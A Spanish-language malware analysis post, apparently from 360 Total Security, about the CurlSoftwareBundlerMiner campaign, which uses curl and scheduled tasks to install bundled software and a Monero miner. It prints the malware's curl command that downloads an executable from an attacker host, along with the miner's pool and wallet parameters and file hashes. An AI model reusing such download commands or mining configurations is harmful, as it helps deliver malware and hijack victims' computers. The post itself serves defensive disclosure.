CurlSoftwareBundlerMiner abusa de una herramienta de código abierto que afecta a más de 300 mil ordenadores

24/05/2018360TS
Más información sobre el 360 Total Security

Hace poco, 360 Total Security ha descubierto que CryptoMiner se ha extendido de forma activa y ahora afecta a más de 300 mil ordenadores. Abusa de conocidas herramientas de código abierto, cURL.exe y wget.exe, para engañar al antivirus. Al descargar malware a través de herramientas buenas y ocultarse en tareas de organización del sistema, la mayoría de los software antivirus no consiguen identificarlo. Los ordenadores infectados tienen instalados entre siete y ocho software cuyos comerciantes pagan al creador del malware para incluir el software en un lote. Tras instalar el lote de software, CryptoMiner empieza a minar. Lo hemos llamado CurlSoftwareBundlerMiner.

Analizo

Según nuestra investigación, a la mayoría de las víctimas se les infecta al descargar herramientas como cracks de software y generadores de claves de fuentes no fiables.

El instalador que se descifra y ejecuta:

Descargar y abusar de CURL.exe:

Crear tareas de organización:

Se han creado dos tareas de organización:

El archivo ejecutable de la entidad de la primera tarea, Curl, es curl_7_54.exe, que contiene el curl de la herramienta de código abierto con los parámetros de línea de comando integrados «-f -s -L http://atotum.ru/f.exe -o “%UserProfile%\AppData\Roaming\curl\curl.exe».

Tras la ejecución, se descarga un malware en la carpeta «%UserProfile%\AppData\Roaming\curl\curl.exe».

La entidad de la segunda tarea, Curls, se ha creado para ejecutar el malware descargado que genera dinero para sus creadores al instalar el software promocionado y minar criptomonedas.

.

Se genera la primera descarga y comienza la instalación del software promocionado.

1.tmp.exe contiene una firma digital oficial, LLC Mail.Ru y descarga na_runner.exe. Tras una breve instalación, crea unas entidades que inician el sistema y corrompe la página de inicio del navegador.

Página de inicio corrupta:

Se genera la segunda descarga y comienza la instalación del software promocionado:

8.temp.exe lleva la misma firma que la primera e instala el navegador promocionado de forma silenciosa.

Descargar e instalar CryptoMiner:

CryptoMiner contiene una firma digital, TOV “RED TABURET”:

Se copia a sí mismo en «C:\WINDOWS\Microsoft\svchost.exe» e imita el servicio del sistema para minar la criptomoneda XMR:

Parámetros de minería:
-a cryptonight
-o stratum+tcp://mine.moneropool.com:3333
-u 4B9Darzi85pHxc53y1KZ6BHpFhdFSbTMYHMbK5BCByM36HsbsXqVzHYHwkybR1272oaZ4zPJ2EP79bw4dRUJR9pLSebAhDM -p x

Archivos relacionados en MD5

f81069b5b3f7d8274e563a628929cde2
4dbc6848a826c4e98587d8fecf390a47
cf464d1f8ff321a74fddb4e00c20876a

Memoro

Hace poco, hemos descubierto que se está extendiendo mucho el malware de CryptoMiner. Recomendamos encarecidamente a los usuarios que habiliten el software antivirus al instalar nuevas aplicaciones. También recomendamos que los usuarios realicen un escaneo de antivirus con 360 Total Security para que eviten ser víctimas de CryptoMiner.

Descargar 360 Total Security: https://www.360totalsecurity.com

Más información sobre el 360 Total Security